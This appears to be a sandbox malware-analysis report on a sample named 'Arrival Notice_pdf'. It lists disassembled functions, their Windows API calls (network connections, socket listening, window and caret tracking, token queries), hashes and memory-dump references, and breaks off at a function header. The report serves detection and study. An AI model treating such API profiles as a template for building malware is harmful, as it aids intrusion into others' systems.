MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00274094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002740CA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a7cb2bca702dbb58e2c791f100d9b55f87da58dc06e877a846ded3bc5f245511
Instruction ID: 7623c79dd061352b8815510f60c9942e192890cb586881888a72b5bc48bbdff6
Opcode Fuzzy Hash: a7cb2bca702dbb58e2c791f100d9b55f87da58dc06e877a846ded3bc5f245511
Instruction Fuzzy Hash: DB31C431620216EFDB25AF75C844B7B7BA5FF40310F15C429EA6987190E731D8B0DB90

Function 002A7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002A7CB9

Part of subcall function 00285F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00285F6F
Part of subcall function 00285F55: GetCurrentThreadId.KERNEL32 ref: 00285F76
Part of subcall function 00285F55: AttachThreadInput.USER32(00000000,?,0028781F), ref: 00285F7D

GetCaretPos.USER32(?), ref: 002A7CCA
ClientToScreen.USER32(00000000,?), ref: 002A7D03
GetForegroundWindow.USER32 ref: 002A7D09

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: e28de422c2bffba09214c622ece5e794310b460e2d968475fb2cc21a8df312a2
Instruction ID: 677a451b57992fcf4fad7d13df46f5dceb21669fbd117de4b9784e75011e0511
Opcode Fuzzy Hash: e28de422c2bffba09214c622ece5e794310b460e2d968475fb2cc21a8df312a2
Instruction Fuzzy Hash: E2313C72910108AFDB10EFA9DC859EFFBF9EF59311B11846AE815E3251DA309E158FA0

Function 002AF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

GetCursorPos.USER32(?), ref: 002AF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002BE4C0,?,?,?,?,?), ref: 002AF226
GetCursorPos.USER32(?), ref: 002AF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002BE4C0,?,?,?), ref: 002AF2A6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d62ec83b2ac881df93d6422f6b4b465f99a6b571454554a69bb89cb627920838
Instruction ID: 3f74897957a0799feb705c7455f7d4cdcfaba1797bb175751b40398a7f87f027
Opcode Fuzzy Hash: d62ec83b2ac881df93d6422f6b4b465f99a6b571454554a69bb89cb627920838
Instruction Fuzzy Hash: CA21B139511018AFCB168F94DC98EFEBBB9EF0A350F444069FD09472A1D7359D61DB50

Function 0029431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00294358

Part of subcall function 002943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00294401
Part of subcall function 002943E2: InternetCloseHandle.WININET(00000000), ref: 0029449E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a541faaa2ce51671c146140a50541c5816e0ee5b2e2dada84bbf550c1e3eb3b8
Instruction ID: 9000f802697b0e5d01d08156b2f2382f32997037a50337b7c2563e9fc79b7052
Opcode Fuzzy Hash: a541faaa2ce51671c146140a50541c5816e0ee5b2e2dada84bbf550c1e3eb3b8
Instruction Fuzzy Hash: 8B21C335210606BFEF16AF70DC00FBBB7A9FF48711F20401AFA5596650DBB198369B94

Function 002A8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 002A8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 002A8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 002A8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002A8ADC

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: fe2aadcc10f07cd856f4095be967030e0d07d0eb5ce6b2925d628470079791c8
Instruction ID: fd3d03bd4f17eedd880c8d4407f4f3e12dcdb71f20c388bc2b1a4459005fb59f
Opcode Fuzzy Hash: fe2aadcc10f07cd856f4095be967030e0d07d0eb5ce6b2925d628470079791c8
Instruction Fuzzy Hash: D7119331265511AFD718AB14DC05FBA779DBF86321F14451AF916C72E2CFB0AD208B94

Function 00298A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00298AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00298AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00298AFF
WSAGetLastError.WSOCK32(00000000), ref: 00298B16

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 5812dbce67d4ea7f55158236c06c57916ea233940502483526e16730f1cbc878
Instruction ID: 3e21c4d934a997e6ac976273a309435f2bfa48ea9f122e1938769afeb9c30677
Opcode Fuzzy Hash: 5812dbce67d4ea7f55158236c06c57916ea233940502483526e16730f1cbc878
Instruction Fuzzy Hash: 83219372A001249FCB119F68D899E9EBBECEF4A710F04816AF849D7291DB74DA458F90

Function 00280AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00281E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00280ABB,?,?,?,0028187A,00000000,000000EF,00000119,?,?), ref: 00281E77
Part of subcall function 00281E68: lstrcpyW.KERNEL32(00000000,?,?,00280ABB,?,?,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00281E9D
Part of subcall function 00281E68: lstrcmpiW.KERNEL32(00000000,?,00280ABB,?,?,?,0028187A,00000000,000000EF,00000119,?,?), ref: 00281ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00280AD4
lstrcpyW.KERNEL32(00000000,?,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00280AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00280B2E

Strings

cdecl, xrefs: 00280B25

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 70cb2fe19e36286cb236b2c285b43106a51979ad90557947089f5b5156763418
Instruction ID: c0c5937cb98298b487ae4ee09dc87860e788412dced2b3ba8d3abb9c48be2f32
Opcode Fuzzy Hash: 70cb2fe19e36286cb236b2c285b43106a51979ad90557947089f5b5156763418
Instruction Fuzzy Hash: 1D11D33A221305EFDB25AF24DC45D7A77A8FF45354B80406AE90ACB291EB719865CBA0

Function 00272F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00272FB5

Part of subcall function 0026395C: __FF_MSGBANNER.LIBCMT ref: 00263973
Part of subcall function 0026395C: __NMSG_WRITE.LIBCMT ref: 0026397A
Part of subcall function 0026395C: RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000001,00000000,?,?,0025F507,?,0000000E), ref: 0026399F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c844b23d7111456164ee7f4bc940b1f11284dc8ce22da54bc50af1aa567a3ea
Instruction ID: 01c723e9f7c430a902224cb12f4471d86b75fb608b03a3d0ad95c93b0e23aa85
Opcode Fuzzy Hash: 5c844b23d7111456164ee7f4bc940b1f11284dc8ce22da54bc50af1aa567a3ea
Instruction Fuzzy Hash: 3A110A32439212EBCB317F74BC4466A3B98AF10364F20C426F84D96161DB75C9B0AE91

Function 0028058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002805AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002805C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002805DD
FreeLibrary.KERNEL32(?), ref: 00280632

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: d7419585c55ee4a7a639c9c611403a7c2e0635b4a299f55631c6baddf2bb31a3
Instruction ID: 522fe595a34e03adf3bee3cc18e626b40daac53fab68177fe1f5c41a717efd97
Opcode Fuzzy Hash: d7419585c55ee4a7a639c9c611403a7c2e0635b4a299f55631c6baddf2bb31a3
Instruction Fuzzy Hash: 01218775911619EFEB60AF91DCC8EDAB7BCEF40700F008469E51692090E7B0EA69DF50

Function 00286713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00286733
_memset.LIBCMT ref: 00286754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002867A6
CloseHandle.KERNEL32(00000000), ref: 002867AF

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: e2f01d99ad6773249bd8f27de088e39c8e777b79fc1e75d34b0f6cfafca25b50
Instruction ID: 413f7c25f7b7c91e87be4768f812f825735462cca680d5197a1d1b6c9847e143
Opcode Fuzzy Hash: e2f01d99ad6773249bd8f27de088e39c8e777b79fc1e75d34b0f6cfafca25b50
Instruction Fuzzy Hash: D8110A75D012287AE7206BA5AC4DFABBABCEF44764F1041AAF508E71C0D2704E808BA4

Function 0027B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0027AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0027AA79
Part of subcall function 0027AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0027AA83
Part of subcall function 0027AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0027AA92
Part of subcall function 0027AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0027AA99
Part of subcall function 0027AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0027AAAF

GetLengthSid.ADVAPI32(?,00000000,0027ADE4,?,?), ref: 0027B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0027B227
HeapAlloc.KERNEL32(00000000), ref: 0027B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0027B247

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 78777de371072de49d00be6c574790b62a83f50fa8b9719d8d1c97e220425bbf
Instruction ID: 39ebfe1b7244783c536bea1041e94cac1c6869a28b8e71b304802aa7760edc83
Opcode Fuzzy Hash: 78777de371072de49d00be6c574790b62a83f50fa8b9719d8d1c97e220425bbf
Instruction Fuzzy Hash: 4611CE71A11206EFCB059F98DC94FAEB7B9EF84318F14C06DE94A97211D771AE54CB10

Function 0027B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0027B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0027B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0027B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0027B4DB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9ef64e643a5155bfbc152665e01d41e7713c772058398314a8666e482eb5c41a
Instruction ID: 5f20e61b3edc2ab1c3b9349994ece829269354867309209f59d750a0acad08d1
Opcode Fuzzy Hash: 9ef64e643a5155bfbc152665e01d41e7713c772058398314a8666e482eb5c41a
Instruction Fuzzy Hash: 44112A7A900218FFDB11DFA9C995F9DBBB8FB08710F208091E604B7295D771AE11DB94

Function 0025B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0025B5A5
GetClientRect.USER32(?,?), ref: 002BE69A
GetCursorPos.USER32(?), ref: 002BE6A4
ScreenToClient.USER32(?,?), ref: 002BE6AF

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 5046762977ff246ff020d5ef3f0a03a2e79a40a7afb11bd81df4e99cc6f9e3ca
Instruction ID: 8ee99852af513ac9da959823c8f50c2b5e3bc4412c0555d2c5f5b1f63356298f
Opcode Fuzzy Hash: 5046762977ff246ff020d5ef3f0a03a2e79a40a7afb11bd81df4e99cc6f9e3ca
Instruction Fuzzy Hash: 4811363591002ABBCB15DF98DC49CEE77B8EB09305F500455E912E7140E774AAA9CBA5

Function 0028732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00287352
MessageBoxW.USER32(?,?,?,?), ref: 00287385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0028739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002873A2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: eba359c0efe3441205cf5dd1f67c444cf97fdd43328d318266788f2ce2e2e22c
Instruction ID: 8ed9e6f296a7c331756afec4101e3550754b0d20a6ac9044329e75a787e21baa
Opcode Fuzzy Hash: eba359c0efe3441205cf5dd1f67c444cf97fdd43328d318266788f2ce2e2e22c
Instruction Fuzzy Hash: A6112B76A15205BFC702AF6CEC09E9E7BAD9B45310F144366FC25D3291D770CD108BA1

Function 0025D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
GetStockObject.GDI32(00000011), ref: 0025D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: d975283983e5ac0b26289f60ce14493f439ab59d3f7cb32825164c5b04f97774
Instruction ID: 93b6d93a9d2762265090cae36c866f5fb6d0adc1451fbeafc701ceaff0518d06
Opcode Fuzzy Hash: d975283983e5ac0b26289f60ce14493f439ab59d3f7cb32825164c5b04f97774
Instruction Fuzzy Hash: 6711AD7211190ABFEF228FA0AC54EEABB6DFF08365F048116FE1852050C7719C64DBA0

Function 00274DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00274E16

Part of subcall function 002754F5: __fltout2.LIBCMT ref: 0027551E

__cftog_l.LIBCMT ref: 00274E3C
__cftoe_l.LIBCMT ref: 00274E6E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 65f7b6cd44c16a42df15c544e9192af62c9f986b91bf6f461fa60209f3948741
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 70014B3202014ABBCF126E88DC11CEE7F22BB183A0B588455FE1C59031D376CAB2AB81

Function 00267452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00267A0D: __getptd_noexit.LIBCMT ref: 00267A0E

__lock.LIBCMT ref: 0026748F
InterlockedDecrement.KERNEL32(?), ref: 002674AC
_free.LIBCMT ref: 002674BF
InterlockedIncrement.KERNEL32(00CD2A18), ref: 002674D7

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 4cc48e87f9e5cb9ffdcdd3b53b9f662bcab7e001923e74dc0a58c7a0da7b053c
Instruction ID: f152df38897114601fee8c5cd7063dc664868a5f7f5bfafe38a42fc2d6dd7b5a
Opcode Fuzzy Hash: 4cc48e87f9e5cb9ffdcdd3b53b9f662bcab7e001923e74dc0a58c7a0da7b053c
Instruction Fuzzy Hash: 4F01C432925612DBC711AF64B40D76DBB70BF08728F144056F81863680CF34A9E1CFD2

Function 002AEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

